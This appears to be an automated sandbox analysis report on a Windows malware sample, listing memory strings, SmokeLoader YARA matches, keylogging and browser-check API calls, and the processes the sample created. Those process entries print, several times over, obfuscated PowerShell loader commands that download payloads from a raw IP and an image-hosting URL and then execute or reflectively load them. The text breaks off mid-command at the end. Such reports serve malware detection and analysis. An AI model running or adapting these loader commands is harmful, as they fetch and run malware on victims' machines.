Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 27_2_0279162B GetKeyboardState,ToUnicode,

27_2_0279162B

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\SysWOW64\explorer.exe	Code function: StrStrIA, chrome.exe\|opera.exe\|msedge.exe	20_2_02CA2EA8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe	20_2_02CA3862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe	20_2_02CA3862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe	20_2_02CA3862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe	20_2_02CA3862

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = 